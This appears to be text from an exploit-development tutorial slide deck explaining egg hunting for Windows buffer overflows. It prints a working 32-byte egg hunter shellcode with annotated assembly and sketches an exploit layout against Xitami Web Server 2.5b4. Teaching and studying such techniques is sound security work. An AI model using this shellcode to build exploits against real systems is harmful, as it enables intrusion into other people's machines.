Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
5. @ajinabraham
SOME TERMS RELATED TO EGG HUNTING
Tag: A unique string of 4bytes that act as a marker or tag to search and locate
the shellcode.
Egg: It’s an 8 bytes string formed by combining to tags.
tag+tag+shellcode
Egg Hunter: Small piece of instructions we fill in the limited buffer, which will
search the entire stack or heap to locate the shellcode by searching for the
tag and finally will execute the shellcode.
The Egg and the Egg Hunter is also a part of shellcode.
The bad character restrictions applies to egg hunter instructions too.
6. @ajinabraham
What is Egg Hunting?
Egg hunting is a useful exploitation technique implemented to
overcome the deficiency of a small buffer that cannot hold our
lengthy shellcode.
We might have access to some large buffer in the memory
somewhere else. We will prepend a tag of 4byte length 2 times
forming 8 bytes to our shellcode and place it in the large buffer.
Now we will fill our small buffer with a jump instruction to the egg
hunter. The egg hunter will then search the stack or the heap for
two consecutive tags and find out the shellcode and execute it.
14. @ajinabraham
NtAccessCheck
AndAuditAlarm
00000000 6681CAFF0F or dx,0xfff
00000005 42 inc edx
00000006 52 push edx
00000007 6A02 push byte +0x2
00000009 58 pop eax
0000000A CD2E int 0x2e
0000000C 3C05 cmp al,0x5
0000000E 5A pop edx
0000000F 74EF jz 0x0
00000011 B86C78786C mov eax,0x6C78786C #TAG (lxxl)
00000016 8BFA mov edi,edx
00000018 AF scasd
00000019 75EA jnz 0x5
0000001B AF scasd
0000001C 75E7 jnz 0x5
0000001E FFE7 jmp edi
Size: 32 bytes
Targets: Windows NT/2000/XP/2003
Egg Size: 8 bytes
The Difference between NtDisplayString and NtAccessCheckAndAuditAlarm is that
both uses a different syscall to check if an access violation had occurred or not.
16. @ajinabraham
NtDisplayString / NtAccessCheckAndAuditAlarm
6681CAFF0F or dx,0x0fff ; get last address in page
42 inc edx ; acts as a counter (increments the value in EDX)
52 push edx ; pushes edx value to the stack
; (saves our current address on the stack)
6A43 push byte +0x43 ; push 0x43 for NtDisplayString
; or 0x2 for NtAccessCheckAndAuditAlarm to stack
58 pop eax ; pop 0x43 or 0x2 into eax
; so it can be used as parameter to syscall
CD2E int 0x2e ; make a syscall using the previous register
3C05 cmp al,0x5 ; check if access violation occurs
; (0xc0000005== ACCESS_VIOLATION)
5A pop edx ; restore edx
74EF je xxxx ; jmp back to start dx 0x0fffff
B86C78786C mov eax,0x6C78786C ; tag (lxxl)
8BFA mov edi,edx ; set edi to our pointer
AF scasd ; compare for status
75EA jnz xxxxxx ; (back to inc edx) check egg found or not
AF scasd ; when egg has been found
75E7 jnz xxxxx ; (jump back to "inc edx") ; if only the first egg was found
FFE7 jmp edi ; edi points to begin of the shellcode
Credits: corelanc0d3r
17. @ajinabraham
Limitation of these Egg hunters
SEH, IsBadReadPtr, NtDisplayString,
NtAccessCheckAndAuditAlarm will work only on
Windows NT/2000/XP/2003
So for you can’t use this Egg Hunter
implementation for the later build of Windows
like 7 and 8.
18. @ajinabraham
Lets build up an Exploit
Software: Xitami Web Server 2.5b4
Egg Hunter Implementation: NtAccessCheckAndAuditAlarm
(32bytes hunter and 8 bytes egg)
20. @ajinabraham
Egg Hunter Implementation
ESP
JMP to
reach Egg
hunter
EIP
JMP to ESP
Egg +
Shellcode
Jump to some location with enough buffer
Egg
Hunter
Search for Egg, find it and execute shellcode